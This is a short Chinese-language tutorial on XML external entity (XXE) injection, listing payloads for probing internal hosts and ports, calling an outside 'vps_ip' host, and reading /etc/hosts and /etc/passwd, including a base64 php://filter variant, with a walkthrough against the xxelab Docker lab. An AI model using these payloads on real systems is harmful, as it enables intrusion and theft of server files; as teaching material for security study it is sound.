您好,登錄后才能下訂單哦!
引用外部DTD文件訪問(wèn)內(nèi)網(wǎng)主機(jī)/端口。
<!DOCTYPE a SYSTEM "http://127.0.0.1:2333"> (看響應(yīng)時(shí)間)
引用外部DTD文件訪問(wèn)wai網(wǎng)。
<!DOCTYPE a SYSTEM "http://vps_ip" >
引用內(nèi)部實(shí)體。
<!DOCTYPE a [<!ENTITY xxe "findneo">]><a>&xxe;</a>
外部實(shí)體讀本地文件。
<!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///etc/hosts">]><a>&xxe;</a>
外部實(shí)體訪問(wèn)內(nèi)wang主機(jī)端口。
<!DOCTYPE a SYSTEM "http://192.168.1.2:80">(看響應(yīng)時(shí)間)
外部實(shí)體訪問(wèn)wai網(wǎng)。
<!DOCTYPE a [<!ENTITY xxe SYSTEM "http://vps_ip">]><a>&xxe;</a>
docker中下載rrodrigo/xxelab該鏡像
啟動(dòng):docker run -d -p 8082:80 rrodrigo/xxelab
抓取注冊(cè)包,發(fā)現(xiàn)采用xml格式傳遞,且郵箱有返回:
將返回內(nèi)容處進(jìn)行xxe回顯設(shè)置讀取/etc/passwd
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE c [
<!ENTITY file SYSTEM "/etc/passwd">
]>
利用base64編碼進(jìn)行xxe,防止有返回包驗(yàn)證
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE c [
<!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
]>
返回base64數(shù)據(jù)包,base64解碼
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。